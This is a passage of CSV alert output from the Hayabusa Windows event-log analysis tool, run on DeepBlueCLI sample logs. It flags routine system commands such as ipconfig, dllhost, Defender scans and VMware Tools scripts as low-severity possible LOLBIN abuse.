Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:10:05.018 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.611 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:21:09.562 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
